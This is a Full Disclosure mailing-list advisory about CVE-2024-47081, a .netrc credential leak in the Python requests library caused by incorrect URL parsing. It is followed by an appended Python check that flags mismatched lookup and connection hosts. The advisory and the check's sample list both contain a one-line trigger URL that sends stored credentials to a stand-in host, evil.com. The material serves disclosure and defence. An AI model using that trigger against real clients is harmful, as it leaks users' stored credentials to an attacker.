Message-ID: <vXnhIIDfNauWIt5MizRQzyPhX--T3oCrKfPV4ixDc2J1W9iwF3zUR7g-9q1zz966EbG6Nf3Q5EX37ezTHJR_HgHXshROjRfXLDWl1AEInXA=@protonmail.ch>
Date: Sat, 31 May 2025 06:30:50 +0000
From: Juho Forsén via Fulldisclosure <fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] CVE-2024-47081: Netrc credential leak in PSF requests library

The PSF requests library (https://github.com/psf/requests & https://pypi.org/project/requests/) leaks .netrc credentials to third parties due to incorrect URL processing under specific conditions.

Issuing the following API call triggers the vulnerability:

    requests.get('http://example.com:@evil.com/')

Assuming .netrc credentials are configured for example.com, they are leaked to evil.com by the call.

The root cause is https://github.com/psf/requests/blob/c65c780849563c891f35ffc98d3198b71011c012/src/requests/utils.py#L240-L245

The vulnerability was originally reported to the library maintainers on September 12, 2024, but no fix is available. CVE-2024-47081 has been reserved by GitHub for this issue.

As a workaround, clients may explicitly specify the credentials used on every API call to disable .netrc access.

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
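The following pre-flight check is an added example, not part of the original post and not code from the requests project. It flags URLs where a credential lookup keyed on the text before the first ":" of the netloc would pick a different host than the one the connection goes to. Modelling the lookup that way is an assumption about the linked lines, all function names are hypothetical, and the sample URLs are constructed.

```python
from urllib.parse import urlsplit


def naive_lookup_host(url):
    """Host as seen by a lookup that keeps only the text before the
    first ':' of the netloc (assumed model of the flawed processing)."""
    return urlsplit(url).netloc.split(":")[0].lower()


def connect_host(url):
    """Host the request is actually sent to: userinfo and port removed."""
    return urlsplit(url).hostname


def netrc_lookup_is_consistent(url):
    """True only if the lookup host and the connection host agree."""
    real = connect_host(url)
    return real is not None and naive_lookup_host(url) == real


def audit_urls(urls):
    """Return (url, lookup_host, connect_host) for every URL where stored
    credentials for one host could be attached to a request to another."""
    findings = []
    for url in urls:
        if not netrc_lookup_is_consistent(url):
            findings.append((url, naive_lookup_host(url), connect_host(url)))
    return findings


# Constructed sample input: two ordinary URLs and the one from the advisory.
SAMPLE_URLS = [
    "https://example.com/api/v1/items",
    "https://example.com:8443/api/v1/items",
    "http://example.com:@evil.com/",
]

if __name__ == "__main__":
    for url, lookup, real in audit_urls(SAMPLE_URLS):
        print(f"REJECT {url!r}: lookup host {lookup!r}, connects to {real!r}")
```

A client that accepts URLs from untrusted input can run such a check before issuing the request, in addition to the workaround of passing credentials explicitly on every call.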